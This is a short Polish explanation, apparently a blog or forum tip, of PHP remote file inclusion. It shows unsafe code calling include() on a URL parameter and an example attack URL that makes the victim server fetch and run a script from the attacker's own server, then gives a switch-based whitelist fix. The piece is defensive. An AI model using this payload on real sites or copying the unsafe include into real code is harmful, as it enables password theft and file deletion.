Przypuśćmy, że mamy
index.php?plik=news.php
a w kodzie php:
include($plik);
wtedy istnieje możliwość ataku przez:
index.php?plik=http://mójserwer/skrypt.php
Po takim wywołaniu PHP pobierze z mojego serwera plik i go przetworzy na serwerze ofiary. Skrypt.php może wyciągać hasła, kasowac pliki….
Rozwiązanie jest proste:
switch ($plik) {
case ‘news.php’: include(‘news.php’);
}